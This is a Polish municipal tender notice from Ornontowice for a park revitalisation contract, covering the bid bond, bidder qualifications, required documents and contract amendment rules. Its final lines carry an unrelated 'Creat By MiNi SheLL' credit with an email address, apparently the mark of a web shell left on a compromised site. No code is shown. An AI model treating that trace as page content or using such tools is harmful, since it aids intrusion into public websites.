<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 50 000 zł.Słownie złotych:  pięćdziesiąt tysięcy złotych.Wadium może być wniesione w:- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym że poręczenie kasy  jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158   z późniejszymi zmianami). Termin wnoszenia wadium upływa w dniu: 28.03.2014 r.  o godzinie 11:30. Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: 
Orzesko Knurowski Bank Spółdzielczy w Knurowie O/Ornontowice  28 8454 1053 2001 0011 0695 0009.Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez Zamawiającego nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami (np. umieszczony  w koszulce, co pozwoli na swobodne oddzielenie wadium od reszty dokumentów).Zamawiający zwróci wniesione wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 2.7. lit. a  rozdziału SIWZ. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie                z zapisem  rozdziału SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania, jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca ten wnosi wadium w terminie określonym przez Zamawiającego. Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy.Zamawiający zatrzyma wadium wraz z odsetkami:a) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,b) jeżeli Wykonawca, którego oferta została wybrana:
- odmówi podpisania umowy na warunkach określonych w ofercie,- nie wniesie zabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnych warunków zamówienia, - zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia w zakresie prac projektowych Wykonawca musi wykazać, że  wykonał , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie wykonał:a) co najmniej jedną dokumentację projektową na zagospodarowanie terenów zielonych o powierzchni co  najmniej 3,5 ha;b)  co najmniej jedną dokumentację  projektową  na budowę nowego obiektu kubaturowego wraz z uzyskaniem pozwolenia na budowę.W zakresie posiadania wiedzy i doświadczenia w zakresie robót budowlanych Wykonawca musi wykazać, że wykonał, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:a) co najmniej  dwie  roboty polegające na budowie lub rozbudowie lub przebudowie obiektu kubaturowego   o wartości zamówienia minimum 700 000,00 zł brutto każda;b) co najmniej  dwie  roboty brukarskie na powierzchni minimum 2000 m2 każda.W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane,-  dowody dotyczące głównych usług wymienionych w wykazie,  określające,  że  usługi wykazane w wykazie zostały wykonane lub są wykonywane należycie,
- wykaz  robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania. 
- dowody dotyczące najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dowodami, o których mowa powyżej są:- poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na  3 miesiące przed upływem terminu składania wniosków  o dopuszczeniu do udziału w postępowaniu albo ofert;-w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa;
- w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn  o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi, roboty budowlane  wskazane w załączniku nr 4 a i 4b do SIWZ  zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W razie konieczności, szczególnie  gdy wykaz lub dowody, o których mowa odpowiednio powyżej, budzą wątpliwości Zamawiającego  lub gdy z poświadczenia albo z innego dokumentu wynika, ze zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane, usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie  na zasadzie  spełnia - nie spełnia. Nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym: Zamawiający nie określa w tym zakresie szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia tego warunku udziału  w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać, że dysponuje lub  będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia tj.a) jedną osobą z uprawnieniami w specjalności architektonicznej do projektowania bez ograniczeń, b) jedną osobą, która będzie pełnić funkcję kierownika budowy (robót), posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,
c) jedną osobą, która będzie pełnić funkcję kierownika budowy (robót), posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych,
d) jedną osobą, która będzie pełnić funkcję kierownika budowy (robót), posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej  obowiązujących przepisów oraz  zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000r.  o samorządach zawodowych architektów, inżynierów budowlanych oraz urbanistów (Dz. U. z 2001r. Nr 5, poz. 42, z późniejszymi zmianami) lub spełniającymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r.  Prawo budowlane (tekst jednolity               Dz. U. z 2013r. poz. 1409) tj. osoby których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych  lub spełniającymi wymogi o których mowa w art 20a ustawy z dnia 15.12.2000r. O samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych)W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych i wykształcenia niezbędnego dla wykonania zamówienia, a także zakresu wykonywanych przez nią czynności oraz informacją o podstawie do dysponowania tymi osobami -  zgodnie z załącznikiem  nr 5 do SIWZ.Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie  na zasadzie  spełnia - nie spełnia. Nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.b) oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zgodnie z załącznikiem nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa w tym zakresie szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia tego warunku udziału  w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ.2. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.3.W przypadku wniesienia wadium w postaci pieniężnej, zalecane jest dołączenie do oferty kopii potwierdzenia nadania przelewu.
4.W przypadku wniesienia wadium w postaci niepieniężnej, należy dołączyć do oferty oryginał dokumentu potwierdzającego wniesienie wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiająca przewiduje możliwość istotnych zmian postanowień zawartej umowy, w stosunku do treści oferty, napodstawie której dokonano wyboru Wykonawcy.
-Zmiana postanowień niniejszej umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo zamówień publicznych.  - Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika z następujących okoliczności:1) Zmiany terminu realizacji przedmiotu umowy, w następstwie:  siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności a które uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej. Pod pojęciem siły wyższej rozumie się w szczególności zdarzenia i okoliczności takie jak: klęska żywiołowa, działania wojenne, terroryzm, rewolucja, zamieszki, strajk spowodowany przez inne osoby nie związane z realizacją inwestycji itp.;2) niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie robót, co wymaga potwierdzenia przez inspektora nadzoru stosownym wpisem do Dziennika Budowy (nie dotyczy warunków atmosferycznych typowych dla pory roku);3) wystąpienie niewypałów, niewybuchów, innych przedmiotów stanowiących zagrożenie;4) wystąpienie wykopalisk archeologicznych, itp.; 5) okoliczności leżących po stronie Zamawiającej i nie wynikających z przyczyn leżących po stronie Wykonawcy (np. wstrzymanie, zawieszenie, przerwa w realizacji Inwestycji). Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem ukończenia przedmiotu umowy w sposób należyty. Zmiana terminu realizacji Inwestycji nie wpływa na zmianę wynagrodzenia.6) Zmiany wynagrodzenia, w następstwie zmiany będącej skutkiem działań organów państwowych; (ustawowa zmian obowiązującej stawki  podatku VAT lub wprowadzenie nowego podatku, dewaluacja złotego powyżej 15% rocznie);7) Zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy.  Wykonawca może powierzyć te czynności innym osobom o kwalifikacjach, uprawnieniach spełniających co najmniej takie warunki jakie podano                       w specyfikacji istotnych warunków zamówienia dla przeprowadzonego postępowania, po wyrażeniu pisemnej zgody przez Zmawiającą; 8) Zmiany podwykonawcy lub wprowadzenie podwykonawcy w zakresie nie przewidzianym w treści oferty złożonej przez Wykonawcę, w przypadku, gdy Wykonawca polegał na zasobach podwykonawcy (wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia, zdolnościach finansowych). W celu wykazania spełniania warunków udziału w postępowaniu o udzielenia przedmiotowego zamówienia, zmiana podwykonawcy jest dopuszczalna pod warunkiem, że nowy podwykonawca spełnia co najmniej takie warunki jak podano w specyfikacji istotnych warunków zamówienia dla przeprowadzonego postępowania;9) Zmiana osób wyznaczonych do realizacji umowy, ze strony Zmawiające do w przypadku braku możliwości nadzoru przez te osoby, zmiana ta nie wymaga zawarcia aneksu do umowy; 10) Zmiana danych związana z obsługą administracyjno - organizacyjną umowy, (danych teleadresowych Wykonawcy; Zamawiającego), zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej stronie  i nie wymaga zawarcia aneksu do umowy; 3. Wszelkie zmiany i uzupełnienia niniejszej umowy dokonane w sposób zgodny z ustawą Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności - aneks do umowy, z zastrzeżeniem przypadków określonych    w niniejszym punkcie, w których wskazano, że nie jest wymagane zawarcie aneksu do umowy. Zmiana umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznych jest nieważna.4. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.5. Niedopuszczalne są zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie które dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu lub specyfikacji istotnych warunków zamówienia oraz określił jej warunki. 6. Dopuszcza się możliwość zmiany umowy w zakresie osobowym projektantów branżowych jeżeli osoby wskazane  w umowie z przyczyn obiektywnych nie mogą pełnić dalej powierzonych im funkcji, a osoby mające je zastąpić posiadają wymagane prawem uprawnienia i doświadczenie. 7. Dopuszcza się możliwość zmiany umowy w zakresie terminu, jeżeli w czasie realizacji zadania wystąpią okoliczności  uniemożliwiające jego realizację z winy Zamawiającego - termin wydłuża się o czas przestoju lub jeżeli miały miejsce utrudnienia w uzyskaniu uzgodnień. 8.Dopuszcza się możliwość zmiany umowy w zakresie koniecznych robót zamiennych, których nie można było przewidzieć na etapie ogłoszenia o zamówieniu.9. Dopuszcza się możliwość zmiany umowy w zakresie osobowym kierownika budowy lub inspektora nadzoru jeżeli osoby wskazane w umowie z przyczyn obiektywnych nie mogą pełnić dalej powierzonych im funkcji, a osoby mające je zastąpić posiadają wymagane prawem uprawnienia i doświadczenie. 10. Dopuszcza się możliwość zmiany umowy w zakresie terminu, jeżeli w czasie realizacji zadania nastąpią warunki atmosferyczne uniemożliwiające jego realizację - termin wydłuża się o czas przestoju lub jeżeli miały miejsce utrudnienia z wejściem na teren prywatny, w związku z zmianami własnościowymi lub podobnymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ornontowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ornontowice ul. Zwycięstwa 26a, 43-178 Ornontowice, pokój 320..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 11:30, miejsce: Urząd Gminy Ornontowice ul. Zwycięstwa 26a, 43-178 Ornontowice, pokój 320..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Rewitalizacja obiektu - Park Gminny w Ornontowicach, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com